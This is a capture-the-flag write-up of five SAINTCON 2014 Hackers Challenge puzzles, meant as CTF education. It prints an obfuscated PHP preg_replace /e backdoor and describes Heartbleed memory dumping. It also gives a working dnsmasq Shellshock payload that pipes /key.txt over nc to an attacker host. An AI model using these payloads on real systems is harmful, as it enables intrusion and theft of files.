You can find the SAINTCON 2014 Hackers Challenge Introduction here.
And here are all the files referenced below: SAINTCON_2014_Hackers_Challenge_PP.zip
The challenges referenced below can be found here:
PP100 – Talk the Talk, Walk the Walk
Puzzle:
Here is what you get: GLOE-IH DZEH AH-JAD TLA-GIN A-KHA TSIN-TLITI AH-NAH A-WOH NE-AHS-JAH KLESH WOL-LA-CHEE TKIN A-CHIN THAN-ZIE MOASI TLO-CHIN TSAH D-AH CHA DZEH JAD-HO-LONI AH-NAH TSAH-AS-ZIH TKIN DIBEH CHINDI TOISH-JEH NA-HASH-CHID
Solution:
Google for a word or two from the ciphertext, e.g. DZEH or CHINDI.
Aha! Navajo!
LEARN MORE at http://navajocodetalkers.org/
So drop it in a tool like this: http://cryptii.com/navajo/select
And get WELCOMETOSAINTCONTHEKEYISDBB
But DBB doesn’t work.
So LEARN MORE http://www.history.navy.mil/faqs/faq61-4.htm
D CHINDI DEVIL
B TOISH-JEH BARREL
B NA-HASH-CHID BADGER
Key: devilbarrelbadger
PP200 – Vuln Web App
Puzzle:
Start Here: http://54.172.118.66/hc.php
Use the source, Luke!
Solution:
Browse to the page and we see
What now? <!-- Not this source --> eJxdjM0KgkAYRfdB7/A1bQois3a2iEGFlmYStdGm8foD0cg0CkL07I1tgs7qLs65jUaZaTR3ITFjzrGNNvHqgXzigC0Y989ZKGRxicLGT17R6RxfgzRM1m/JUuYOcO7+wzm37e+Kzbfj0ZQOHgV1Tr1qqYLQJG6qNWQqkBQahnIYSFN32A0292gPKpU11FfSym5VEDro3iZPLOkD1DA4tQ==
So how do we get the PHP Source? Google some answers!
http://stackoverflow.com/a/1319647
So we try: http://54.172.118.66/hc.php
and get
<?php
# This source
if (strpos($_SERVER['REQUEST_URI'],'phps')){
    show_source(__FILE__);
}
$b = base64_decode('cHJlZ19yZXBsYWNlKCIvU3VQM1IwbmVkIS9lIiwiQUNYX0VhY2ZZUEVwQ1R8UFZYUmBEXkVUMn5jIl4iMTExMTFBQTExMTExMTExMTExMTExMTExQUFBIiwiU3VQM1IwbmVkISIpOw0KIyBROiBEaWQgeW91IGhlYXIgYWJvdXQgdGhlIGNhcmV0IGRldGVjdGl2ZT8NCiMgQTogSGUgZ290IHRvIHRoZSByb290IG9mIGV2ZXJ5IGNhc2UuIA==');
$b = base64_encode(gzcompress($b));
print "What now?\n";
print '<!-- Not this source --> ';
print $b;
If you base64 decode the $b string you get:
preg_replace("/SuP3R0ned!/e","ACX_EacfYPEpCT|PVXR`D^ET2~c"^"11111AA11111111111111111AAA","SuP3R0ned!");
# Q: Did you hear about the caret detective?
# A: He got to the root of every case.
The key here is that the 'e' modifier on the end of the preg_replace pattern makes PHP evaluate the replacement argument as code, effectively an eval. That makes the payload easy to run and observe, if desired.
LEARN MORE at http://mrbluecoat.blogspot.com/2012/03/evolution-of-php-backdoor-evasion.html
But done the hard way, the string in the middle is a bitwise XOR (the caret operator) of the two quoted strings, which works out to:
print "WhatAreMagicQuotes?";
Key: WhatAreMagicQuotes
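To check that decoding without evaluating the /e payload, here is an added Python helper (not part of the original writeup) that emulates PHP's string XOR on the two quoted strings above, reverses the base64_encode(gzcompress()) wrapping of the "Not this source" blob, and flags preg_replace() calls whose pattern carries the /e modifier. The function names and the regex are my own; the string constants are copied from the page.

```python
import base64
import re
import zlib

# The two quoted strings from the decoded preg_replace() call (copied from above).
LEFT = 'ACX_EacfYPEpCT|PVXR`D^ET2~c'
RIGHT = '11111AA11111111111111111AAA'

# What hc.php prints after "<!-- Not this source -->" (copied from above).
HIDDEN_BLOB = 'eJxdjM0KgkAYRfdB7/A1bQois3a2iEGFlmYStdGm8foD0cg0CkL07I1tgs7qLs65jUaZaTR3ITFjzrGNNvHqgXzigC0Y989ZKGRxicLGT17R6RxfgzRM1m/JUuYOcO7+wzm37e+Kzbfj0ZQOHgV1Tr1qqYLQJG6qNWQqkBQahnIYSFN32A0292gPKpU11FfSym5VEDro3iZPLOkD1DA4tQ=='

# Matches preg_replace("<delim>pattern<delim>modifiers", ...) in either quote style.
PREG_CALL = re.compile(r'preg_replace\(\s*(["\'])(.)(.*?)\2([A-Za-z]*)\1', re.S)


def php_string_xor(a: str, b: str) -> str:
    """Emulate PHP's string '^' operator: byte-wise XOR over the common length
    (PHP silently drops the surplus bytes of the longer operand)."""
    return ''.join(chr(x ^ y) for x, y in zip(a.encode('latin-1'), b.encode('latin-1')))


def pack_hidden_source(text: str) -> str:
    """What hc.php does to $b: base64_encode(gzcompress($b)). gzcompress()
    emits zlib-format data, so zlib.compress() is the exact counterpart."""
    return base64.b64encode(zlib.compress(text.encode('latin-1'))).decode('ascii')


def unpack_hidden_source(blob: str) -> str:
    """Reverse pack_hidden_source(): base64-decode, then inflate."""
    return zlib.decompress(base64.b64decode(blob)).decode('latin-1')


def uses_eval_modifier(php_src: str) -> bool:
    """Flag a preg_replace() whose pattern carries the /e modifier (deprecated in
    PHP 5.5, removed in 7.0). With /e the replacement argument is evaluated as
    PHP code, which is how an innocuous-looking XOR of two literals hides a statement."""
    m = PREG_CALL.search(php_src)
    return bool(m) and 'e' in m.group(4)


if __name__ == '__main__':
    hidden = unpack_hidden_source(HIDDEN_BLOB)
    print(hidden)                                   # the preg_replace() line
    print('uses /e:', uses_eval_modifier(hidden))  # True
    print(php_string_xor(LEFT, RIGHT))             # print "WhatAreMagicQuotes?"
```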
PP300 – SQLBooster
Puzzle:
Initial Clue: Search for a member of the Committee "Troy Jessup"
Included Files: None
This challenge begins at: http://sqlbooster.bruti.us/inject-a-thon
Solution:
This was solvable using very simple SQL injection.
Key:
PP400 –
Puzzle:
https://ssl.l34n.ninja
Hints: Troy suggests a browser add-on that helps with cookie inspection and modification.
Solution:
This was vulnerable to Heartbleed.
Using a tool like:
https://github.com/robertdavidgraham/heartleech
I was able to find this string in about 22MB of dumped memory:
thismightdosomething=nE7zpjDPiVBL2V5mugddhg==
and this one:
Your Key Is: MySessionsAreBleeding
If you modified the request to include that cookie variable and value, the returned page contained the key.
Key: MySessionsAreBleeding
PP500 – HackMe
Puzzle:
Somewhere in the con is an Ubuntu 14.04 computer that is just dying to connect to the SSID: HackMe, with the WPA Password: saintcon2014. The key is located on that computer in /key.txt. Good luck.
Solution:
So once a PC connects to a network, it requests an IP address via DHCP.
The Linux DHCP client was vulnerable to the Shellshock bug, because DHCP option values it receives are passed to bash hook scripts through the environment.
http://llify.com/2014/10/10/reverse-shell-from-a-the-bash-shell-shock-exploit-with-a-dnsmasq-dhcp-sever/
I exploited it this way using dnsmasq:
dhcp-range=10.13.13.13,10.13.13.130,10m
dhcp-option-force=100,() { :; }; /bin/nc 10.13.13.1 1337 < /key.txt
And just had nc -l -p 1337 running.
And I got the key.
Key: